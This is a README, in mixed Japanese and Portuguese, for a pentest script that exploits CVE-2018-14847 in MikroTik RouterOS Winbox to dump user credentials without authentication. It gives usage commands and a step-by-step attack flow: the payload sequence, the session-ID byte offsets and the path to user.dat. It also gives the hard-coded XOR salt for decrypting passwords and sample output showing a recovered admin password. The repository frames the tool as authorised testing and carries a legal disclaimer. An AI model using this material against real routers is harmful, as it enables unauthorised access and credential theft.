
ネットワーク監査および侵入テスト用のスクリプトリポジトリ。 正式な許可を得たデバイスでのみ使用してください。
MikroTik RouterOS の Winbox サービスにおける未認証ファイル読み取りの脆弱性を悪用します。
ファイルハンドラー(ハンドラーID 2)は認証を検証しないため、外部の攻撃者がデバイスの全ユーザー名と
パスワードを含む user.dat ファイルを読み取ることができます。
パスワードは鍵 MD5(usuario + "283i4jfkai3389") を使用した XOR で暗号化されて保存されます。
スクリプトは復号を自動的に実行します。
| ブランチ | 影響を受ける最終バージョン | 修正バージョン |
|---|---|---|
| Stable | 6.42 | 6.42.1 |
| Long-term | 6.40.7 | 6.40.8 |
| RC | 6.42 | 6.43 |
python3 cve_2018_14847.py <IP>
python3 cve_2018_14847.py <IP> --port 8291
# Alvo padrão na porta 8291
python3 cve_2018_14847.py 192.168.1.1
# Porta customizada
python3 cve_2018_14847.py 192.168.1.1 --port 8291
1. Conecta na porta 8291 (Winbox)
↓
2. Envia FIRST_PAYLOAD — abre sessão + solicita /flash/rw/store/user.dat
↓
3. Extrai Session ID do byte 38 da resposta
↓
4. Injeta Session ID no byte 19 do SECOND_PAYLOAD
↓
5. Envia SECOND_PAYLOAD — lê o arquivo user.dat
↓
6. Parseia entradas M2 → extrai usuário e senha cifrada
↓
7. Descriptografa senha: XOR com MD5(usuario + salt)
↓
8. Exibe credenciais e salva em arquivo
═══════════════════════════════════════════════════════
CVE-2018-14847 — MikroTik Winbox Credential Dump
Unauthenticated File Read + Password Decryption
Afetado: RouterOS 6.29 – 6.42 (< 6.40.8 / 6.42.1)
═══════════════════════════════════════════════════════
Alvo : 192.168.1.1:8291
Data : 2026-05-20 18:06:58
[*] Conectando em 192.168.1.1:8291 ...
[+] Conectado ao serviço Winbox.
[*] Enviando payload 1 (requisição de arquivo) ...
[+] Resposta recebida (84 bytes). Session ID: 0x35
[*] Enviando payload 2 (leitura do user.dat) ...
[+] Dados recebidos (312 bytes).
[*] Analisando user.dat (257 bytes úteis) ...
═══════════════════════════════════════════════════════
CREDENCIAIS EXTRAÍDAS
═══════════════════════════════════════════════════════
Usuário : admin
Senha : senha123
Combo : admin:senha123
───────────────────────────────────────────────────────
[+] 1 credencial(is) encontrada(s).
[+] Resultado salvo em: mikrotik_1192.168.1.1_20260520_180658.txt
結果は自動的に以下のファイルに保存されます:
mikrotik_<IP>_<TIMESTAMP>.txt
例:mikrotik_192.168.1.1_20260520_180658.txt
内容:ターゲット IP、日付、CVE、影響を受けるバージョン、およびすべての usuário:senha ペア。
/rede/
├── README.md # este arquivo
├── cve_2018_14847.py # MikroTik Winbox Credential Extractor
├── pentest_cgnat_100.64.0.0.md # relatório de pentest CGNAT
├── pentest_roteador_192.168.2.1.md # relatório de pentest roteador
└── mikrotik_<IP>_<TIMESTAMP>.txt # resultados gerados pelo script
法的免責事項: これらのツールは、許可された環境でのみ使用するためのものです。 第三者システムに対する無許可の実行は、法律 12.737/2012(Carolina Dieckmann法)および ブラジル刑法第154-A条に基づく犯罪です。